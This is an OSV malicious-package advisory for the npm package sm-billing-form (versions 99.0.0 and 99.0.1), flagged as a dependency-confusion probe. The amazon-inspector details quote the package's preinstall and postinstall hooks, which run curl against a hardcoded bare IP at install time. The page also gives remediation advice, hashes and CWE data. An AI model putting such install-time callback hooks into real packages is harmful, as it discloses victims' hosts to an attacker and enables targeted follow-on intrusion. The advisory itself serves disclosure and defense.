MAL-2026-14395

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sm-billing-form/MAL-2026-14395.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-14395
Aliases
  • GHSA-5fmw-xf3x-g32g
Published
2026-08-23T18:50:26Z
Modified
2026-08-24T16:46:04Z
Summary
Malicious code in sm-billing-form (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (422b9f6c71b124deff27a41ef4b595c308595c14af77dbd3756de0e625f86fc2)

package.json defines preinstall and postinstall lifecycle scripts that run curl -s http://16.192.173.5/sm-billing-form/pre and curl -s http://16.192.173.5/sm-billing-form/post on npm install. The requests target a hardcoded bare-IP endpoint over cleartext HTTP with no relationship to any documented publisher, and fire automatically as part of the default install. The pattern is a dependency-confusion / typosquat probe: the callback confirms to the operator of 16.192.173.5 which environments resolved the public sm-billing-form name and installed it, disclosing source IP and install timing and enabling targeted follow-on attacks against those hosts. The version number (99.0.0) is consistent with a dependency-confusion lure intended to outrank an internal package of the same name.

Source: ghsa-malware (05532377799ac53b2d8c7d981cf5c4714e656a575a24ff5fe28255b6b72a211e)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Source: ossf-package-analysis (a67679a3ead3448ddc6b3e62b9dac763b12cf129253be8ae5a4678962db8b4df)

The OpenSSF Package Analysis project identified 'sm-billing-form' @ 99.0.1 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-018609",
            "import_time": "2026-08-24T05:20:14.412808105Z",
            "modified_time": "2026-08-24T05:07:26Z",
            "sha256": "422b9f6c71b124deff27a41ef4b595c308595c14af77dbd3756de0e625f86fc2",
            "source": "amazon-inspector",
            "versions": [
                "99.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-018605",
            "import_time": "2026-08-24T05:20:13.996349842Z",
            "modified_time": "2026-08-24T05:06:49Z",
            "sha256": "da27d1a074c3e64edb3f1a248d8d86bc2abdf4bbad8f829211567d8d477e23fb",
            "source": "amazon-inspector",
            "versions": [
                "99.0.1"
            ]
        },
        {
            "import_time": "2026-08-24T05:47:54.901495968Z",
            "modified_time": "2026-08-23T18:50:26Z",
            "sha256": "a67679a3ead3448ddc6b3e62b9dac763b12cf129253be8ae5a4678962db8b4df",
            "source": "ossf-package-analysis",
            "versions": [
                "99.0.1"
            ]
        },
        {
            "id": "GHSA-5fmw-xf3x-g32g",
            "import_time": "2026-08-24T16:26:16.73189747Z",
            "modified_time": "2026-08-24T15:42:57Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "05532377799ac53b2d8c7d981cf5c4714e656a575a24ff5fe28255b6b72a211e",
            "source": "ghsa-malware"
        }
    ]
}
References
Credits

Affected packages

npm / sm-billing-form

Package

Name
sm-billing-form
View open source insights on deps.dev
Purl
pkg:npm/sm-billing-form

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

99.*
99.0.0
99.0.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "eac2fe44169cccaf27db7124bed5485ef3d2ea9251030512c2b5a594a46a5cbb",
            "tlsh": "dfd0c96e0609a7325a884be9aad5a5086891428000926926c2da0aa28f123b8a10ef5e"
        }
    ],
    "package_integrity": [
        {
            "filename": "sm-billing-form-99.0.0.tgz",
            "hashes": {
                "sha1": "32491d1fac34b04d52f12ddfb271b3f0c2660047",
                "sha512_sri": "sha512-AzgPj7OCiDEgJhZZyrsgkFXeNcmEBCaW10pe64qJ1/knW4M0XGlNRWyUbekDQDFjBo6lS1lukGb10izpIiRRbA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sm-billing-form/MAL-2026-14395.json"